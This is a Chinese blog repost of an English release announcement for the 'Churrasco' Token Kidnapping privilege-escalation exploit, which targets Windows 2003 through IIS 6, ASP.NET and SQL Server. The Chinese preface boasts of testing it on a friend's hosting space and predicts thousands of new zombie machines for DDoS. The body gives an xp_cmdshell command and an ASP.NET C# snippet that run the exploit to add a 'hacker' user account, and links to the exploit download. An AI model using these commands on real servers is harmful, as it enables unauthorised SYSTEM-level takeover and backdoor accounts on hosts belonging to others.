zoukankan      html  css  js  c++  java
  • iis6+asp.net服务器致命漏洞

    前天同事发现了这个漏洞,今天我又在朋友的空间测试了下,确实可以运行一切命令,


    至今为止,MS没有出补丁,估计中国又增加成千上万的肉鸡了。DDOS又要更猛了.

    It has been a long time since Token Kidnapping presentation (http://
    www.argeniss.com/research/TokenKidnapping.pdf) was published so I
    decided to release a PoC exploit for Win2k3 that alows to execute code
    under SYSTEM account.

    Basically if you can run code under any service in Win2k3 then you can
    own Windows, this is because Windows services accounts can
    impersonate.
    Other process (not services) that can impersonate are IIS 6 worker
    processes so if you can run code from an ASP .NET or classic ASP web
    application then you can own Windows too. If you provide shared
    hosting services then I would recomend to not allow users to run this
    kind of code from ASP.


    -SQL Server is a nice target for the exploit if you are a DBA and want
    to own Windows:

    exec xp_cmdshell 'churrasco "net user /add hacker"'


    -Exploiting IIS 6 with ASP .NET :
    ...
    System.Diagnostics.Process myP = new System.Diagnostics.Process();
    myP.StartInfo.

    RedirectStandardOutput = true;
    myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
    myP.StartInfo.UseShellExecute = false;
    myP.StartInfo.Arguments= " \"net user /add hacker\" ";
    myP.Start();
    string output = myP.StandardOutput.ReadToEnd();
    Response.Write(output);
    ...


    You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

    Enjoy.
     Posted by Cesar Cerrudo at 4:10 PM
  • 相关阅读:
    MySQL的操作
    Centos7下MySQL的安装
    一键安装Tomcat
    Hola!
    eval
    初级版笔记(修改中)
    decode前先encode(python)
    不能scanf字符串
    第一次做题的一些问题c++
    DSY3163*Eden的新背包问题
  • 原文地址:https://www.cnblogs.com/LCX/p/1366374.html
Copyright © 2011-2022 走看看